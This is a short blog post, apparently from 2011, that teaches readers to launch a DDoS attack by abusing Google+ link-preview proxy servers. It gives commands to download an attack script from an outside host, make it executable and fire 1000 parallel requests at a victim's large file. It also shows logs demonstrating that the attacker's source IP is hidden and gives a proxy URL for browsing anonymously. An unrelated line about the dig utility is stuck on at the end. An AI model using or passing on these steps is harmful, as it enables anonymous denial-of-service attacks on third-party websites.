Recently we wrote about ApacheKiller that freezes Victim Server in seconds. While this new findings by IHTeam express that Google+ Servers can be use for DDoS attack. Lets talk about this ant script, Hey.. but it is worthy π
How DDoS Attack Using Google+ Servers works?
When you post a URL on your Google+ status it fetches URL Summary (It includes Image + Short description) using Google+ Proxy Servers.
Advisory report says;Β vulnerable pages are β/_/sharebox/linkpreview/β Β and βgadgets/proxy?β
So if you send multiple parallel requests with a big number e.g 1000 that can be turn into DDoS attack using Google+ Servers huge bandwidth.
How to use DDoS script to launch a DDoS attack Using Google+ Servers?
Download :
wget static.hackersgarage.com/ddos-using-google-servers.sh.hackersgarage.com
Make it shorter :
mv ddos-using-google-servers.sh.hackersgarage.com ddos.sh
Make it executable :
chmod u+x ddos.sh
Example of Usage :
./ddos.sh http://www.victim-website.com/some-file-url/file-name.mp3 1000
Now, lets look at this example :
It is recommended to find a full path to some big file which is downloadable without requesting for CAPTCHA.
e.g http://www.victim-website.com/some-file-url/file-name.mp3
NOTE : Make sure your workstation is capable to handle this huge number else your workstation will freeze and you will have to force fully restart your own workstation π
e.g 1000Β is very big number.
You will see anonymous source instead of Real Source IP:
See sample apache webserver log below
209.85.228.85 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.88 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.228.90 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.91 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.226.81 - - [31/Aug/2011:15:34:18 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
209.85.228.86 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
74.125.152.84 - - [31/Aug/2011:15:34:21 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
74.125.152.81 - - [31/Aug/2011:15:34:33 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
You can also access it in browser to remain anonymous using below example URL (replace URL with your own choice) :
https://images1-focus-opensocial.googleusercontent.com/gadgets/proxy?url=http://www.Hackersgarage.com&container=none
If you have any question or unable to run this, Feel free to write us π
dig – Domain Information Groper is a light weight Linux utility for querying DNS records. It is widely used to diagnose DNS servers, troubleshoot DNS servers, purge DNS Cache using external DNS server and dozen of great features it provides.
